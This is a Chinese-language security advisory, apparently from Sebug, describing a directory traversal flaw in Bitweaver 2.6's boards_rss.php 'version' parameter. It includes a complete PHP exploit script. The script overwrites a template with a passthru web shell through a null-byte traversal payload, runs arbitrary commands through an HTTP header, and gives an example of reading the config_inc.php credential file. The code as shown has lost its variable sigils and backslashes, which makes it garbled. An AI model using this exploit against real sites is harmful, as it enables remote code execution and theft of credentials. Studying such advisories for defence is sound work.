Bitweaver version参数目录遍历漏洞

Bitweaver version参数目录遍历漏洞

影响版本:
Bitweaver Bitweaver <= 2.6漏洞描述:
BUGTRAQ  ID: 34910

Bitweaver是免费的开源web应用框架和内容管理系统。

Bitweaver的boards/boards_rss.php模块没有正确地过滤对version参数所传送的输入便用于创建文件：

    ...
    echo rss->saveFeed( rss_version_name, cacheFile );
    ...
    
以不安全方式调用了saveFeed()函数，基于_REQUEST[version]变量的参数可能包含有目录遍历序列。

在/rss/feedcreator.class.php的saveFeed()函数中：
    
    ...
    function saveFeed(filename="", displayContents=true) {
    if (filename=="") {
    filename = this->_generateFilename();
    }
    if ( !is_dir( dirname( filename ))) {
    mkdir_p( dirname( filename ));
    }
    feedFile = fopen(filename, "w+");
    if (feedFile) {
    fputs(feedFile,this->createFeed());
    fclose(feedFile);
    if (displayContents) {
    this->_redirect(filename);
    }
    } else {
    echo "<br /><b>Error creating feed file, please check write permissions.</b><br/>";  }
    }
    
    }
    ...
    
无论php.ini设置如何，用户都可以创建任意文件夹、覆盖文件，还可以以任意扩展名结束路径。
<*参考 
http://secunia.com/advisories/35057/
http://marc.info/?l=bugtraq&m=124213918429416&w=2
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有安全性,仅供安全研究与教学之用,风险自负!<?php

    err[0] = "[!] This script is intended to be launched from the cli!";
    err[1] = "[!] You need the curl extesion loaded!";
    
    if (php_sapi_name() <> "cli") {
        die(err[0]);
    }
    if (!extension_loaded(’curl’)) {
        win = (strtoupper(substr(PHP_OS, 0, 3)) === ’WIN’) ? true :
        false;
        if (win) {
            !dl("php_curl.dll") ? die(err[1]) :
            nil;
        } else {
            !dl("php_curl.so") ? die(err[1]) :
            nil;
        }
    }
    
    function syntax() {
        print (
        "Syntax: php ".argv[0]." [host] [path] [user] [pass] [cmd] [options]   /n". /
"Options:                                                               /n". /
"--port:[port]       - specify a port                                   /n". "        /
default->80                                      /n". "--proxy:[host:port] - use /
proxy                                        /n". "Examples:   php ".argv[0]." /
192.168.0.1 /bitweaver/ bookoo pass ls    /n". "            php ".argv[0]." /
192.168.0.1 / bookoo pass ls -a --proxy:1.1.1.1:8080/n". "            php /
".argv[0]." 192.168.0.1 / bookoo pass cat ../kernel/config_inc.php --port:81");  /
die();  }
    
    
    error_reporting(E_ALL);
    host = argv[1];
    path = argv[2];
    _usr = argv[3];
    _pwd = argv[4];
    _cmd = "";
    for (i = 5; i < argc; i++) {
        if ((!strstr(argv[i], "--proxy:")) and (!strstr(argv[i], "--port:"))) {
            _cmd .= " ".argv[i];
        }
    }
    argv[5] ? print("[*] Command->_cmd/n") :
     syntax();
    _use_proxy = false;
    port = 80;
    
    for (i = 3; i < argc; i++) {
        if (stristr(argv[i], "--proxy:")) {
            _use_proxy = true;
            tmp = explode(":", argv[i]);
            proxy_host = tmp[1];
            proxy_port = (int)tmp[2];
        }
        if (stristr(argv[i], "--port:")) {
            tmp = explode(":", argv[i]);
            port = (int)tmp[1];
        }
    }
    
    function _s(url, cmd, is_post, request) {
        global _use_proxy, proxy_host, proxy_port, cookie;
        ch = curl_init();
        curl_setopt(ch, CURLOPT_URL, url);
        if (is_post) {
            curl_setopt(ch, CURLOPT_POST, 1);
            curl_setopt(ch, CURLOPT_POSTFIELDS, request."/r/n");
        }
        curl_setopt(ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt(ch, CURLOPT_USERAGENT, "Googlebot/1.0 (googlebot@googlebot2.com /
http://googlebot2.com/)");  curl_setopt(ch, CURLOPT_TIMEOUT, 0);
        curl_setopt(ch, CURLOPT_HEADER, 1);
        headers = array("Cookie: cookie", "Cmd: ".cmd." > ./../readme");
        curl_setopt(ch, CURLOPT_HTTPHEADER, headers); 
        

        if (_use_proxy) {
            curl_setopt(ch, CURLOPT_PROXY, proxy_host.":".proxy_port);
        }
        _d = curl_exec(ch);
        if (curl_errno(ch)) {
            die("[!] ".curl_error(ch)."/n");
        } else {
            curl_close(ch);
        }
        return _d;
    }
    
    my_template = "themes/templates/footer_inc.tpl";
    url = "http://host:port".path."boards/boards_rss.php";
    _o = _s(url, "", 0, "");
    if (stristr(_o, "404 Not Found")) {
        die ("[!] Vulnerable script not found!/n");
    }
    //catch site cookie, this is needed for version compatibility, not needed in /
2.6.0  _tmp = explode("Set-Cookie: ", _o);
    cookie = "";
    for (i = 1; i < count(_tmp); i++) {
        _tmpii = explode(";", _tmp[i]);
         cookie .= _tmpii[0]."; ";
    }
    print("[*] Cookie->".cookie."/n");
    _o = _s(url, "", 1, "version=//x00&");
    _o = _s(url, "", 1, "u=_usr&p=_pwd&version=/../../../../my_template/x00&");
    if (stristr(_o, "<?xml version=/"1.0/" encoding=/"UTF-8/"?>")) {
        print ("[*] ’my_template’ successfully overwritten!/n");
    } else {
        print(_o);
        die("[!] Error! No write permission on /".my_template." ...");
    }
    if (stristr(_o, "{php}passthru(/_SERVER[HTTP_CMD]);{/php}")) {
        print ("[*] Shell injected!/n");
    } else {
        print(_o);
        die("[!] Error! Shell not injected!");
    }
    url = "http://host:port".path."wiki/index.php";
    _o = _s(url, _cmd, 0, "");
    url = "http://host:port".path."readme";
    _o = _s(url, "", 0, "");
    if (stristr(_o, "404 Not Found")) {
        die ("[!] stdout file not found!/n");
    } else {
        print("[*] Success!/n"._o);
    }
?>SEBUG安全建议:
 Bitweaver
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.bitweaver.org/